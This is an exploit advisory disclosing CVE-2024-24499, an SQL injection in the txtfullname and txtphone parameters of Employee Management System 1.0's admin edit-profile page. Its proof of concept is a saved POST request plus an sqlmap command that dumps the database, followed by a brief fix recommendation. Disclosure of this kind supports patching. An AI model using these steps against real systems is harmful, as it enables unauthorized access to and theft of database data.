# Exploit Title: Employee Management System 1.0 - `txtfullname` and `txtphone` SQL Injection
# Date: 2 Feb 2024
# Exploit Author: Yevhenii Butenko
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2024-24499

### SQL Injection:

> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.

### Affected Components:

> /employee_akpoly/Admin/edit_profile.php

> Two parameters `txtfullname` and `txtphone` within admin edit profile mechanism are vulnerable to SQL Injection.


![txtfullname](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_edit_txtfullname_sqli.png?raw=true)

![txtphone](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_edit_txtphone_sqli.png?raw=true)

### Description:

> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.

## Proof of Concept:

### SQLMap

Save the following request to `edit_profile.txt`:

```
POST /employee_akpoly/Admin/edit_profile.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
Origin: http://localhost
Connection: close
Referer: http://localhost/employee_akpoly/Admin/edit_profile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

txtfullname=Caroline+Bassey&txtphone=0905656&old_image=uploadImage%2Fbird.jpg&btnupdate=
```

Use `sqlmap` with `-r` option to exploit the vulnerability:

```
sqlmap -r edit_profile.txt --level 5 --risk 3 --batch --dbms MYSQL --dump
```


## Recommendations

When using this Employee Management System, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.